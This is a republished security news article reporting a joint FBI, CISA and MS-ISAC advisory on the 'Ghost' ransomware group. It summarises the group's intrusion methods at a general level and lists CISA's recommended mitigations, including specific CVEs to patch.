Source: www.infosecurity-magazine.com – Author:
The US authorities have released new details of the long-running “Ghost” ransomware group originating in China, claiming it has compromised victim organizations in over 70 countries.
The advisory was issued by the FBI, Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC), and features new indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs).
Also known as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada and Rapture, the financially motivated group is unusual in hailing from China, given that most ransomware actors are located in former Soviet states.
However, in other ways it shares many similarities with the rest of the ransomware underground.
Initial access is usually obtained by exploiting known vulnerabilities in public-facing systems, such as Fortinet FortiOS appliances, and servers running Adobe ColdFusion, Microsoft SharePoint and Microsoft Exchange.
“Ghost actors have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems,” the report noted.
“Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day.”
Read more on ransomware: Ransomware Attacks Surge to Record High in December 2024
The group uses Cobalt Strike as well as various open source tools for privilege escalation, and Cobalt Strike again for credential access, domain account discovery, lateral movement and command and control (C2).
The tool is also deployed to list which anti-malware systems are running on a victim machine, in order to disable them, the report explained.
“Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid,” the advisory added. “However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked.”
It Pays to Enhance Baseline Security
The group appears to go after the low-hanging fruit, often abandoning attacks when confronted with hardened systems and network segmentation that prevents lateral movement, the report noted.
That may explain why a large number of its victims are purportedly SMBs, as well as critical infrastructure providers, schools and universities, healthcare organizations, government bodies, religious institutions, and technology and manufacturing companies.
CISA urged organizations to mitigate the threat from Ghost by:
- Regularly backing up and storing backups separately from source systems
- Patching known vulnerabilities in a timely, risk-based manner, especially CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207
- Segmenting networks to restrict lateral movement
- Deploying phishing-resistant multi-factor authentication (MFA) for all privileged and email services accounts
Original Post URL: https://www.infosecurity-magazine.com/news/cisa-fbi-warn-global-threat-ghost/
Category & Tags: –
Views: 3
